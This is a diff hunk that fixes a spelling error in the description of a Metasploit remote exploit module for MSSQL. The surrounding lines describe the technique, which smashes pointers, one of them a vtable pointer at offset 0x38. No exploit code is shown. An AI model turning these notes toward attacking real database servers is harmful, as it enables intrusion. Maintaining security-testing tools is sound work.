@@ -23,7 +23,7 @@ class MetasploitModule < Msf::Exploit::Remote
         This exploit smashes several pointers, as shown below.
 
         1. pointer to a 32-bit value that is set to 0
-        2. pointer to a 32-bit value that is set to a length influcenced by the buffer
+        2. pointer to a 32-bit value that is set to a length influenced by the buffer
           length.
         3. pointer to a 32-bit value that is used as a vtable pointer. In MSSQL 2000,
           this value is referenced with a displacement of 0x38. For MSSQL 2005, the
